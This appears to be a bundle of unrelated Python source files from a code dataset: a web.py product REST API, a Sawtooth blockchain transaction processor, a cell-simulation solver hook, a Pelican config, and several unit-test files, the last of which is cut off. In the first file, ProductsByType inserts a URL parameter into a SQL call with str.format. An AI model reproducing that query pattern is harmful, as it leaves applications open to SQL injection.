GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"select * from Tejuana.Tag\")\n\t\t\treturn tagFactory(results)\n\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\ttag = json.loads(data)\n\t\t\tinsertTag(tag)\n\nclass ProductsByType:\n\tdef GET(self, prodType):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"call Tejuana.ProductListBy({0})\".format(prodType))\n\t\t\timages = query(\"SELECT * FROM Tejuana.Product_Image\")\n\n\t\t\treturn productListFactory(results, images)\n\nclass Product:\n\tdef GET(self):\t\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"select * from Tejuana.ProductList\")\n\t\t\timages = query(\"SELECT * FROM Tejuana.Product_Image\")\n\n\t\t\treturn productListFactory(results, images)\n\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tproduct = json.loads(data)\n\t\t\tvalidateProduct(product)\n\t\t\tinsertProduct(product)\n\n\tdef PUT(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tproduct = json.loads(data)\n\t\t\tvalidateProduct(product)\n\t\t\tupdateProduct(product)\n\nclass AddProductType:\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tproductType = json.loads(data)\n\t\t\tinsertProductType(productType)\n\t\t\t\n\n################################################################################\n#VALIDATORS\n################################################################################\n\ndef validateProduct(product):\n\tif (product[\"Name\"] == \"hola\"):\n\t\traise BadRequest(\"Producto invalido: No puede llamarse 
hola\")","sub_path":"rest/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"197602786","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ------------------------------------------------------------------------------\n'''\nTransaction family class for marbles.\n'''\n\nimport traceback\nimport sys\nimport hashlib\nimport logging\n\nfrom sawtooth_sdk.processor.handler import TransactionHandler\nfrom sawtooth_sdk.processor.exceptions import InvalidTransaction\nfrom sawtooth_sdk.processor.exceptions import InternalError\nfrom sawtooth_sdk.processor.core import TransactionProcessor\n\nLOGGER = logging.getLogger(__name__)\n\nFAMILY_NAME = \"marbles\"\n\n\ndef _hash(data):\n    '''Compute the SHA-512 hash and return the result as hex characters.'''\n    return hashlib.sha512(data).hexdigest()\n\n\n# Prefix for marbles is the first six hex digits of SHA-512(TF name).\nsw_namespace = _hash(FAMILY_NAME.encode('utf-8'))[0:6]\n\n\nclass Marble:\n    def __init__(self, args):\n        if len(args) != 4:\n            raise InvalidTransaction(\"Invalid number of args\")\n\n        self.name = args[0]\n        self.color = args[1]\n        self.size = int(args[2])\n        self.owner = args[3]\n\n    def to_string(self):\n        return \",\".join([self.name, self.color, str(self.size), self.owner])\n\n\nclass MarblesTransactionHandler(TransactionHandler):\n    '''\n    Transaction Processor class for the marbles transaction family.\n\n    This class communicates with the validator using the accept/get/set functions.\n    It implements functions to init, read, transfer and delete marbles.\n    '''\n\n    def __init__(self, namespace_prefix):\n        self._namespace_prefix = namespace_prefix\n\n    @property\n    def family_name(self):\n        return FAMILY_NAME\n\n    @property\n    def family_versions(self):\n        return ['1.0']\n\n    @property\n    def namespaces(self):\n        return [self._namespace_prefix]\n\n    def apply(self, transaction, context):\n        '''This implements the apply function for this transaction handler.\n\n           This function does most of the work for this class by processing\n           a single transaction for the marbles transaction family.\n        '''\n\n        # Get the payload and extract marbles-specific information.\n        header = transaction.header\n        payload_list = transaction.payload.decode().split(\",\")\n        operation = payload_list[0]\n        args = payload_list[1:]\n\n        # Get the public key sent from the client.\n        from_key = header.signer_public_key\n\n        # Perform the operation.\n        LOGGER.info(\"Operation = \" + operation)\n\n        if operation == \"initMarble\":\n            self._init_marble(context, args)\n        elif operation == \"deleteMarble\":\n            self._delete_marble(context, args)\n        elif operation == \"transferMarble\":\n            if len(payload_list) == 3:\n                self._transfer_marble(context, args)\n        else:\n            LOGGER.info(\"Unhandled action. 
\" +\n                        \"Operation should be initMarble, deleteMarble or transferMarble\")\n\n    def _init_marble(self, context, args):\n        key = args[0]\n        marble_address = self._get_marble_address(key)\n        LOGGER.info('Got the key {} and the marble address {} '.format(\n            key, marble_address))\n        current_entry = context.get_state([marble_address])\n\n        if current_entry != []:\n            raise InvalidTransaction(\"Marble already exists\")\n\n        state_data = str(','.join(args)).encode('utf-8')\n        addresses = context.set_state({marble_address: state_data})\n\n        if len(addresses) < 1:\n            raise InternalError(\"State Error\")\n\n    def _delete_marble(self, context, args):\n        if len(args) != 1:\n            raise InvalidTransaction(\"Invalid number of args\")\n\n        key = args[0]\n        marble_address = self._get_marble_address(key)\n        LOGGER.info('Got the key {} and the marble address {} '.format(\n            key, marble_address))\n        marble = context.get_state([marble_address])\n\n        if marble == []:\n            LOGGER.info('No marble with the key {} '.format(key))\n            return\n\n        LOGGER.info('Deleting marble {} '.format(key))\n        addresses = context.delete_state([marble_address])\n\n        if len(addresses) < 1:\n            raise InternalError(\"State Error\")\n\n    def _transfer_marble(self, context, args):\n        if len(args) != 2:\n            raise InvalidTransaction(\"Invalid number of args\")\n\n        key = args[0]\n        to_person = args[1]\n\n        marble_address = self._get_marble_address(key)\n        LOGGER.info('Got the key {} and the marble address {} '.format(\n            key, marble_address))\n        current_entry = context.get_state([marble_address])\n\n        if current_entry == []:\n            raise InvalidTransaction(\"Marble does not exist\")\n\n        marble = Marble(current_entry[0].data.decode().split(\",\"))\n        marble.owner = to_person\n\n        context.set_state({marble_address: marble.to_string().encode('utf-8')})\n\n    def _get_marble_address(self, from_key):\n        return _hash(FAMILY_NAME.encode('utf-8'))[0:6] + _hash(from_key.encode('utf-8'))[0:64]\n\n\ndef setup_loggers():\n    logging.basicConfig()\n    logging.getLogger().setLevel(logging.DEBUG)\n\n\ndef main():\n    '''Entry-point function for the marbles transaction processor.'''\n    setup_loggers()\n    try:\n        # Register the transaction handler and start it.\n        processor = TransactionProcessor(url='tcp://validator:4004')\n\n        handler = MarblesTransactionHandler(sw_namespace)\n\n        processor.add_handler(handler)\n\n        processor.start()\n\n    except KeyboardInterrupt:\n        pass\n    except SystemExit as err:\n        raise err\n    except BaseException as err:\n        traceback.print_exc(file=sys.stderr)\n        sys.exit(1)\n","sub_path":"pyprocessor/processor/marbles_tp.py","file_name":"marbles_tp.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"616484334","text":"\"\"\"\nThe hook simulation driver for a Hybrid CME-ODE JCVI Syn3A simulation.\n\nAuthor: David Bianchi\n\"\"\"\n\nimport Simp as Simp\nimport Rxns as Rxns\nimport integrate as integrate\nimport copy as copy\nimport in_out as in_out\nimport sys\nimport pandas as pd\nimport numpy as np\nimport time as timer\nimport lm as lm\n\n### Define our own hybrid CME-ODE solver class derived from the LM Gillespie Direct Solver:\nclass MyOwnSolver(lm.GillespieDSolver):\n\n\n    def __init__(self, delt, ode_step, speciesCount, cythonBool, resTime, procID):\n\n        \"\"\"\n        Initialize the ODE hook solver\n\n        Parameters:\n        self, the object pointer\n        delt (float), communication timestep between hook simulation and main LM simulation\n        ode_step (float), the maximum stepsize given an Adaptive Timestepping 
ODE solver\n speciesCount (species Count), instance of SpeciesCount Class used to pass species count data\n cythonBool (bool), Should ODE Reaction Solver be compiled with Cython (True, False)\n resTime (float), the total simulation time of each CME Hook Simulation = Restart Time (in minutes)\n procID (str), The Process ID for each simulated \"cell\".\n \n\n Returns:\n None\n \"\"\"\n\n # Call the constructor for the derived class\n # Not necessary to use MESolverFactory.setSolver('lm::cme::GillespieDSolver)?\n lm.GillespieDSolver.__init__(self)\n\n # Save the initial conditions, for restarting the solver upon a new replicate\n self.ic = (delt,ode_step,speciesCount,cythonBool,resTime)\n\n # The time a which hook solver has been stepped into, initial value = 0\n self.oldtime = 0.0\n\n # The process ID for creating flux log files etc.\n self.procID = str(procID)\n\n print(\"initializing solver\")\n\n # Set the initial conditions\n self.restart()\n \n def restart(self):\n\n \"\"\"\n Get the same initial conditions for a new simulation replicate (Restart the Hook)\n\n Parameters:\n self, the object pointer\n\n Returns:\n None\n \"\"\"\n \n # Set the previous time to be 0, we are starting the simulation\n self.oldtime = 0.0\n\n # Deep Copy of all of the initial conditions\n self.delt = copy.deepcopy(self.ic[0])\n self.odestep = copy.deepcopy(self.ic[1])\n self.species = copy.deepcopy(self.ic[2])\n self.cythonBool = copy.deepcopy(self.ic[3])\n self.resTime = copy.deepcopy(self.ic[4])\n\n # Update need enzyme Counts in the particle map\n self.species.update(self)\n\n print(\"Done with restart\")\n\n \n \n def hookSimulation(self, time):\n\n \"\"\"\n The hookSimulation method defined here will be called at every frame write\n time. The return value is either 0 or 1, which will indicate if we\n changed the state or not and need the lattice to be copied back to the GPU\n (In the case of the RDME) before continuing. 
If you do not return 1, \n your changes will not be reflected.\n\n Parameters:\n self, the object pointer\n time, the current simulation time\n\n Returns:\n\n 1 (int), if changes should be passed to the main LM Simulation\n 0 (int), if changes should not be passed to the main lm Simulation\n \"\"\"\n\n # We have reached the simulation start time, if doing multiple replicates\n # No need to update\n if (time==0.0):\n print(\"New Replicate\", flush=True)\n self.restart()\n minute = 0\n return 0\n\n # We are at a CME-ODE communication timestep\n else:\n\n # At the first timestep update the needed protein counts\n if ((time > self.delt) and (time < (self.delt*2.0))):\n self.species.update(self)\n #Simp.upIC(self.species)\n #Simp.upIC(self.species)\n\n # Update to current solver species counts\n start = timer.time()\n print(\"Updating species: \", start)\n self.species.update(self)\n end = timer.time()\n print(\"Finished update: \",end)\n print(\"Time is: \",time)\n\n # Initialize and define the reaction model\n model = Simp.initModel(self.species)\n\n\n ### Want to get the current values, not necessarily the initial values\n initVals=integrate.getInitVals(model)\n\n ### Boolean control of cython compilation, versus scipy ODE solvers\n cythonBool = self.cythonBool\n\n if (cythonBool == True):\n solver=integrate.setSolver(model)\n \n else:\n solver=integrate.noCythonSetSolver(model)\n\n ### Run the integrator: But instead of passing self.delt pass self.oldtime\n res = integrate.runODE(initVals,time,self.oldtime,self.odestep,solver,model)\n\n resFinal = res[-1,:]\n \n resStart = res[0,:]\n \n if (int(time)/100).is_integer():\n print('Progress: ' + str(int(time)) + ' out of ' + str(int(self.resTime)))\n \n if (int(time)/60).is_integer():\n minute = int(int(time)/60)\n currentFluxes = solver.calcFlux(0, resStart )\n\n # Create list of reactions and fluxes\n fluxList = []\n for indx,rxn in enumerate(model.getRxnList()):\n fluxList.append( (rxn.getID(), currentFluxes[indx]) )\n\n fluxDF = pd.DataFrame(fluxList)\n\n fluxFileName = '../simulations/fluxes/' + 'rep-' + self.procID + '-fluxDF.csv' #'/fluxDF_'+str(self.iter)+'min_start.csv'\n\n fluxDF.to_csv(fluxFileName,header=False,mode='a')\n \n minute = int(int(time)/60)\n currentFluxes = solver.calcFlux(0, resFinal )\n\n # Create list of reactions and fluxes\n fluxList = []\n for indx,rxn in enumerate(model.getRxnList()):\n fluxList.append( (rxn.getID(), currentFluxes[indx]) )\n\n fluxDF = pd.DataFrame(fluxList)\n\n fluxFileName = '../simulations/fluxes/' + 'rep-' + self.procID + '-fluxDF-end.csv' #'/fluxDF_'+str(self.iter)+'min_end.csv'\n\n fluxDF.to_csv(fluxFileName,header=False,mode='a')\n \n\n fluxFileName = '../simulations/fluxes/' + 'rep-' + self.procID + '-fluxDF.csv' #'/fluxDF_'+str(self.iter)+'min.csv'\n\n fluxDF.to_csv(fluxFileName,header=False,mode='a')\n\n print('Saved fluxes at ' + str(minute) + ' minutes.')\n \n print('Saved final fluxes.')\n\n\n if time > (self.resTime-self.delt):\n print(time)\n minute = int(int(time)/60)\n finalFluxes = solver.calcFlux(0, resFinal )\n\n # Create list of reactions and fluxes\n fluxList = []\n for indx,rxn in enumerate(model.getRxnList()):\n fluxList.append( (rxn.getID(), finalFluxes[indx]) )\n\n fluxDF = pd.DataFrame(fluxList)\n fnStr='../simulations/fluxes/'+ 'rep-' + self.procID + '-fluxDF_final.csv' #'/' + str(self.iter) + 'fluxDF_final.csv'\n print(\"Writing Final Fluxes and Csvs for Restart\")\n fluxDF.to_csv(fnStr,index=False,header=False,mode='a')\n\n\n # Get the previous time in minutes\n 
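# (illustrative note: `time` here is the simulation time in seconds, so\n            # int(int(time)/60) floors it to whole minutes, e.g. time = 125.7 -> minute = 2)\n            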
minute = int(int(time)/60)\n            # Set the previous time to the current time\n            self.oldtime = time\n\n\n            # Write the results\n            in_out.writeResults(self.species, model, resFinal, time, self.procID)\n\n\n            # Update the system with changes\n            return 1\n\n        return 0\n\n    \n","sub_path":"CME_ODE/program/hook_restart.py","file_name":"hook_restart.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"462974570","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*- #\r\nfrom __future__ import unicode_literals\r\n\r\n# This file is only used if you use `make publish` or\r\n# explicitly specify it as your config file.\r\n\r\nimport os\r\nimport sys\r\nsys.path.append(os.curdir)\r\nfrom pelicanconf import *\r\n\r\nSITEURL = 'n'\r\nRELATIVE_URLS = False\r\n\r\nFEED_ALL_ATOM = 'feeds/all.atom.xml'\r\nCATEGORY_FEED_ATOM = 'feeds/%s.atom.xml'\r\n\r\nDELETE_OUTPUT_DIRECTORY = True\r\n\r\n# Following items are often useful when publishing\r\n\r\n#DISQUS_SITENAME = \"\"\r\n# DISQUS_SITENAME = \"https-hazelement-github-io.disqus.com\"\r\n#GOOGLE_ANALYTICS = \"\"\r\n\r\n# Display pages list on the top menu\r\nDISPLAY_PAGES_ON_MENU = True\r\n\r\n# Display categories list on the top menu\r\nDISPLAY_CATEGORIES_ON_MENU = False\r\n\r\n# Display categories list as a submenu of the top menu\r\nDISPLAY_CATEGORIES_ON_SUBMENU = True\r\n\r\n# Display the category in the article's info\r\nDISPLAY_CATEGORIES_ON_POSTINFO = False\r\n\r\n# Display the author in the article's info\r\nDISPLAY_AUTHOR_ON_POSTINFO = False\r\n\r\n# Display the search form\r\nDISPLAY_SEARCH_FORM = True\r\n\r\n# Sort pages list by a given attribute\r\nPAGES_SORT_ATTRIBUTE = 'Title'\r\n\r\n# Display the \"Fork me on Github\" banner\r\nGITHUB_URL = None\r\n\r\n# Blogroll\r\nLINKS = ()\r\n\r\n# Social widget\r\nSOCIAL = ()","sub_path":"publishconf.py","file_name":"publishconf.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"594228140","text":"#!/usr/bin/python3\nimport os\nimport unittest\nfrom datetime import datetime\nfrom pdb import set_trace\nimport handler\nimport json\n\nclass UploaderTests(unittest.TestCase):\n\n    def setUp(self):\n        self.mockfile = './mockfile'\n\n\n    def test_get_url(self):\n        \"\"\" This should validate the '/' endpoint with all the validation steps, e.g.\n        before_request, after_request, version validation, etc.\n        \"\"\"\n        return\n        # response = self.app.post('/')\n        # json = response.json\n        # timestamp = json.get('timestamp', None)\n\n        # self.assertTrue(response.status_code == 200)\n        # self.assertTrue(json.get('id', None))\n        # self.assertTrue(json.get('upload_uri', None))\n        # self.assertTrue(timestamp)\n        # self.assertTrue(json['upload_uri'].endswith(json['id']))\n        # self.assertTrue(datetime.strptime(timestamp, \"%a, %d %b %Y %H:%M:%S %Z\"))\n\n\n    def test_upload_asset_wrong(self):\n        events = {\n            'queryStringParameters': { 'id': 'testfilehere' },\n        }\n        resp = handler.upload_asset(events, {})\n        self.assertTrue(resp['statusCode'] == 404)\n\n\n    def test_upload_asset(self):\n        resp = handler.get_url({}, {})\n        id = resp.get('body', {}).get('id', None)\n        self.assertTrue(id)\n\n        events = {\n            'queryStringParameters': { 'id': id},\n        }\n\n        resp = handler.upload_asset(events, {})\n        self.assertTrue(resp['statusCode'] < 300)\n\n\nif __name__ == '__main__':\n    
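# unittest.main() below runs the UploaderTests cases when this module is executed\n    # directly; pass -v for per-test output, e.g. `python tests.py -v`.\n    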
unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"448859377","text":"import torch\nimport torch.nn as nn\nfrom torchvision.models.densenet import _Transition, _DenseBlock\nimport torch.nn.functional as F\nfrom collections import OrderedDict\n\n\n# Mostly copied from PyTorch implementation with some subtle changes\n# 1. Kernal size of initial features brought down from 7 to 3\n# 2. Removed the 3x3 max pooling layer (we already do enough downsampling)\n# 3. Remove the first DenseBlock with 6 layers; we don't want more than 3\n# DenseBlocks given our input size so the block with least layers is removed\nclass DenseNetCustom(nn.Module):\n r\"\"\"Densenet-BC model class, based on\n `\"Densely Connected Convolutional Networks\" `_\n\n Args:\n growth_rate (int) - how many filters to add each layer (`k` in paper)\n block_config (list of 4 ints) - how many layers in each pooling block\n num_init_features (int) - the number of filters to learn in the first convolution layer\n bn_size (int) - multiplicative factor for number of bottle neck layers\n (i.e. bn_size * k features in the bottleneck layer)\n drop_rate (float) - dropout rate after each dense layer\n num_classes (int) - number of classification classes\n \"\"\"\n def __init__(self, growth_rate=32, block_config=(6, 12, 24, 16),\n num_init_features=64, bn_size=4, drop_rate=0, num_classes=1000):\n\n super(DenseNetCustom, self).__init__()\n\n # First convolution\n self.features = nn.Sequential(OrderedDict([\n ('conv0', nn.Conv2d(3, num_init_features, kernel_size=3, stride=1, padding=1, bias=False)),\n ('norm0', nn.BatchNorm2d(num_init_features)),\n ('relu0', nn.ReLU(inplace=True)),\n ]))\n\n # Each denseblock\n num_features = num_init_features\n for i, num_layers in enumerate(block_config):\n block = _DenseBlock(num_layers=num_layers, num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n self.features.add_module('denseblock%d' % (i + 1), block)\n num_features = num_features + num_layers * growth_rate\n if i != len(block_config) - 1:\n trans = _Transition(num_input_features=num_features, num_output_features=num_features // 2)\n self.features.add_module('transition%d' % (i + 1), trans)\n num_features = num_features // 2\n\n # Final batch norm\n self.features.add_module('norm5', nn.BatchNorm2d(num_features))\n\n # Linear layer\n self.classifier = nn.Linear(num_features, num_classes)\n\n def forward(self, x):\n features = self.features(x)\n out = F.relu(features, inplace=True)\n out = F.adaptive_avg_pool2d(out, (1, 1))\n out = torch.flatten(out, 1)\n out = self.classifier(out)\n return out\n\ndef DenseNetMini(**kwargs):\n r\"\"\" Clipped densenet model with growth rate of 16\n `\"Densely Connected Convolutional Networks\" `_\n \"\"\"\n model = DenseNetCustom(num_init_features=32, growth_rate=16, block_config=(6, 12, 24, 16),\n **kwargs)\n\n return model\n\ndef DenseNetClipped(**kwargs):\n r\"\"\" Clipped densenet model with growith rate of 32\"\"\"\n model = DenseNetCustom()\n return model\n\n\n\n\n\n\n\n\n","sub_path":"models/DensenetCustom.py","file_name":"DensenetCustom.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"643371765","text":"from unittest import mock, TestCase\nimport os\nimport time\nimport json\nfrom datetime import datetime as 
dt\nfrom requests.exceptions import HTTPError\nimport pytz\nfrom pushshift_py import PushshiftAPIMinimal\nfrom tests.mock_response import MockResponse\n\n# pylint: disable=too-many-public-methods\nclass TestPushshiftAPIMinimal(TestCase):\n _pushshift_args = [\n \"sort\",\n \"sort_type\",\n \"after\",\n \"before\",\n \"after_id\",\n \"before_id\",\n \"created_utc\",\n \"score\",\n \"gilded\",\n \"edited\",\n \"author\",\n \"subreddit\",\n \"distinguished\",\n \"retrieved_on\",\n \"last_updated\",\n \"q\",\n \"id\",\n \"metadata\",\n \"unique\",\n \"pretty\",\n \"html_decode\",\n \"permalink\",\n \"user_removed\",\n \"mod_removed\",\n \"subreddit_type\",\n \"author_flair_css_class\",\n \"author_flair_text\",\n \"reply_delay\",\n \"nest_level\",\n \"sub_reply_delay\",\n \"utc_hour_of_week\",\n \"link_id\",\n \"parent_id\",\n \"over_\",\n \"locked\",\n \"spoiler\",\n \"is_video\",\n \"is_self\",\n \"is_original_content\",\n \"is_reddit_media_domain\",\n \"whitelist_status\",\n \"parent_whitelist_status\",\n \"is_crosspostable\",\n \"can_gild\",\n \"suggested_sort\",\n \"no_follow\",\n \"send_replies\",\n \"link_flair_css_class\",\n \"link_flair_text\",\n \"num_crossposts\",\n \"title\",\n \"selftext\",\n \"quarantine\",\n \"pinned\",\n \"stickied\",\n \"category\",\n \"contest_mode\",\n \"subreddit_subscribers\",\n \"url\",\n \"domain\",\n \"thumbnail\",\n \"description\",\n \"public_description\",\n \"title\",\n \"header_title\",\n \"submit_text\",\n \"subscribers\",\n \"comment_score_hide_mins\",\n \"suggested_comment_sort\",\n \"submission_type\",\n \"spoilers_enabled\",\n \"lang\",\n \"is_enrolled_in_new_modmail\",\n \"audience_target\",\n \"allow_videos\",\n \"allow_images\",\n \"allow_videogifs\",\n \"advertiser_category\",\n \"hide_ad\",\n \"subreddit_type\",\n \"wiki_enabled\",\n \"user_sr_theme_enabled\",\n \"whitelist_status\",\n \"submit_link_label\",\n \"show_media_preview\",\n ]\n\n _search_test_data = (\n {\n \"data\": [\n {\"created_utc\": 1530046703, \"id\": \"e1ccvn7\", \"score\": 1},\n {\"created_utc\": 1530047319, \"id\": \"e1ccvn8\", \"score\": 2},\n {\"created_utc\": 1530047619, \"id\": \"e1ccvn9\", \"score\": -3},\n {\"created_utc\": 1530047719, \"id\": \"e1ccvna\", \"score\": 5},\n {\"created_utc\": 1530047819, \"id\": \"e1ccvnb\", \"score\": 8},\n ]\n },\n {\n \"data\": [\n {\"created_utc\": 1530048703, \"id\": \"e1cdvn7\", \"score\": -1},\n {\"created_utc\": 1530049319, \"id\": \"e1cdvn8\", \"score\": -2},\n {\"created_utc\": 1530049619, \"id\": \"e1cdvn9\", \"score\": 3},\n {\"created_utc\": 1530049719, \"id\": \"e1cdvna\", \"score\": -5},\n {\"created_utc\": 1530049819, \"id\": \"e1cdvnb\", \"score\": -8},\n ]\n },\n {\n \"data\": [\n {\"created_utc\": 1530148703, \"id\": \"e1cdvn7\", \"score\": -1},\n {\"created_utc\": 1530149319, \"id\": \"e1cdvn8\", \"score\": -2},\n {\"created_utc\": 1530149619, \"id\": \"e1cdvn9\", \"score\": 3},\n {\"created_utc\": 1530149719, \"id\": \"e1cdvna\", \"score\": -5},\n {\"created_utc\": 1530149819, \"id\": \"e1cdvnb\", \"score\": -8},\n ]\n },\n )\n\n # We always have to set rate limit so that the class doesn't query for it\n _rate_limit = 60\n _base_init_kwargs = {\n \"max_retries\": 27,\n \"max_sleep\": 2390,\n \"backoff\": 7,\n \"rate_limit_per_minute\": 123,\n \"max_results_per_request\": 500,\n \"detect_local_tz\": False,\n \"utc_offset_secs\": 11,\n \"domain\": \"testapi\",\n }\n\n # pylint: disable=protected-access\n def _test_base_init(self, api):\n self.assertEqual(27, api.max_retries)\n self.assertEqual(2390, 
api.max_sleep)\n self.assertEqual(7, api.backoff)\n self.assertEqual(500, api.max_results_per_request)\n self.assertEqual(\"testapi\", api.domain)\n\n self.assertEqual(False, api._detect_local_tz)\n self.assertEqual(11, api._utc_offset_secs)\n\n self.assertEqual(123, api._rlcache.max_storage)\n\n def test_init(self):\n api = PushshiftAPIMinimal(**self._base_init_kwargs)\n self._test_base_init(api)\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._get\")\n def test_init_none_rate_limit(self, mock_get):\n mock_get.return_value = {\"server_ratelimit_per_minute\": 420}\n api = PushshiftAPIMinimal(rate_limit_per_minute=None)\n self.assertEqual(420, api._rlcache.max_storage)\n\n def test_base_url(self):\n api = PushshiftAPIMinimal(\n domain=\"test-domain\", rate_limit_per_minute=self._rate_limit\n )\n self.assertEqual(\"https://test-domain.pushshift.io/{endpoint}\", api.base_url)\n\n def test_utc_offset_secs(self):\n api = PushshiftAPIMinimal(\n detect_local_tz=False, rate_limit_per_minute=self._rate_limit\n )\n self.assertEqual(0, api.utc_offset_secs)\n\n api = PushshiftAPIMinimal(\n detect_local_tz=True, rate_limit_per_minute=self._rate_limit\n )\n for timezone in pytz.common_timezones:\n api._utc_offset_secs = None\n os.environ[\"TZ\"] = timezone\n time.tzset()\n\n expected_secs = dt.utcnow().astimezone().utcoffset().total_seconds()\n actual_secs = api.utc_offset_secs\n\n self.assertEqual(expected_secs, actual_secs)\n\n def test_limited(self):\n # Test all of the arguments listed at\n # https://pushshift.io/api-parameters/\n for arg in self._pushshift_args:\n self.assertFalse(PushshiftAPIMinimal._limited({arg: True}))\n\n # Test the limited arguments\n for arg in PushshiftAPIMinimal._limited_args:\n self.assertTrue(PushshiftAPIMinimal._limited({arg: True}))\n\n def test_epoch_utc_to_local(self):\n timestamps = [\n 1429981843,\n 1519981843,\n 1528981843,\n 1529781843,\n 1529881843,\n 1529931843,\n 1529981843,\n ]\n\n for timestamp in timestamps:\n api = PushshiftAPIMinimal(\n detect_local_tz=False, rate_limit_per_minute=self._rate_limit\n )\n self.assertEqual(timestamp, api._epoch_utc_to_local(timestamp))\n\n api = PushshiftAPIMinimal(\n detect_local_tz=True, rate_limit_per_minute=self._rate_limit\n )\n for timezone in pytz.common_timezones:\n api._utc_offset_secs = None\n os.environ[\"TZ\"] = timezone\n time.tzset()\n\n expected_secs = (\n timestamp - dt.utcnow().astimezone().utcoffset().total_seconds()\n )\n actual_secs = api._epoch_utc_to_local(timestamp)\n\n self.assertEqual(expected_secs, actual_secs)\n\n def test_wrap_thing(self):\n test_data = {\n \"created_utc\": dt.utcnow().timestamp(),\n \"some\": 12,\n \"arbitrary\": True,\n \"Set\": \"of random\",\n \"keys\": \"to\",\n \"test\": 15.0,\n }\n\n kind = \"TestKind\"\n\n api = PushshiftAPIMinimal(\n detect_local_tz=False, rate_limit_per_minute=self._rate_limit\n )\n wrapped = api._wrap_thing(test_data, kind)\n\n self.assertIn(kind, str(wrapped))\n self.assertEqual(test_data[\"created_utc\"], wrapped.created)\n\n self.assertDictEqual(test_data, wrapped.d_)\n\n for key, val in test_data.items():\n self.assertEqual(val, getattr(wrapped, key))\n\n # pylint: disable=no-self-use\n @mock.patch(\"pushshift_py.pushshift_api_minimal.time.sleep\")\n def test_impose_rate_limit(self, mock_sleep):\n mock_rlcache = mock.NonCallableMock(blocked=False, interval=13)\n\n max_sleep = 69\n backoff = 11\n api = PushshiftAPIMinimal(\n max_sleep=max_sleep, backoff=backoff, rate_limit_per_minute=self._rate_limit\n )\n api._rlcache = mock_rlcache\n\n 
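# Reading of _impose_rate_limit's contract (taken from this test, not the library docs):\n        # no sleep while the cache is unblocked; sleep the cache interval, capped at\n        # max_sleep, while blocked; and sleep nth_try * backoff once a retry count is passed.\n        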
api._impose_rate_limit()\n mock_sleep.assert_not_called()\n\n mock_rlcache.blocked = True\n\n api._impose_rate_limit()\n mock_sleep.assert_called_with(13)\n\n mock_rlcache.interval = 87\n\n api._impose_rate_limit()\n mock_sleep.assert_called_with(max_sleep)\n\n mock_rlcache.interval = 0\n\n api._impose_rate_limit(6)\n mock_sleep.assert_called_with(6 * backoff)\n\n def test_add_nec_args(self):\n max_results_per_request = 127\n api = PushshiftAPIMinimal(\n max_results_per_request=max_results_per_request,\n rate_limit_per_minute=self._rate_limit,\n )\n\n expected_payload = {key: True for key in PushshiftAPIMinimal._limited_args}\n\n # Ensure limited calls aren't altered\n self.assertDictEqual(\n expected_payload,\n api._add_nec_args({key: True for key in PushshiftAPIMinimal._limited_args}),\n )\n\n # Ensure limit is added as expected\n self.assertDictEqual(\n {\"arbitrary\": \"value\", \"limit\": max_results_per_request},\n api._add_nec_args({\"arbitrary\": \"value\"}),\n )\n\n # Ensure created_utc is appended to filter\n self.assertDictEqual(\n {\n \"more_arbitrary\": \"more_value\",\n \"limit\": max_results_per_request,\n \"filter\": [\"created_utc\"],\n },\n api._add_nec_args({\"more_arbitrary\": \"more_value\", \"filter\": []}),\n )\n\n # Ensure string filter turned to list\n self.assertDictEqual(\n {\n \"more_arbitrary\": \"more_value\",\n \"limit\": max_results_per_request,\n \"filter\": [\"some_string\", \"created_utc\"],\n },\n api._add_nec_args(\n {\"more_arbitrary\": \"more_value\", \"filter\": \"some_string\"}\n ),\n )\n\n # Ensure iterable-but-not-list filter turned to list\n self.assertDictEqual(\n {\n \"more_arbitrary\": \"more_value\",\n \"limit\": max_results_per_request,\n \"filter\": [0, 1, 2, \"created_utc\"],\n },\n api._add_nec_args(\n {\"more_arbitrary\": \"more_value\", \"filter\": set(x for x in range(0, 3))}\n ),\n )\n\n # Ensure \"created_utc\" string filter turned to list\n self.assertDictEqual(\n {\n \"more_arbitrary\": \"more_value\",\n \"limit\": max_results_per_request,\n \"filter\": [\"created_utc\"],\n },\n api._add_nec_args(\n {\"more_arbitrary\": 